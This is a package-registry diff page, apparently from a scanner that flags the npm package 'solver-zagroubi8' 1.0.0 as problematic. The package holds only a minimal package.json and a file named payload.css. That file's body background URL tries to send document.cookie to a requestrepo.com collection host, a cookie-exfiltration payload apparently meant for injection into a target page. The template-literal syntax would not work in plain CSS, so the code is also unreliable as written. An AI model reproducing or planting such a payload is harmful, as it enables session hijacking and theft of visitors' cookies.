solver-zagroubi8 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of solver-zagroubi8 might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/package.json +11 -0
  2. package/payload.css +4 -0
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "solver-zagroubi8",
3
+ "version": "1.0.0",
4
+ "main": "payload.css",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1"
7
+ },
8
+ "author": "",
9
+ "license": "ISC",
10
+ "description": ""
11
+ }
package/payload.css ADDED
@@ -0,0 +1,4 @@
1
+ body {
2
+ background: url(`https://q71zz4gi.requestrepo.com?c=${document.cookie}`);
3
+ background-color: blue;
4
+ }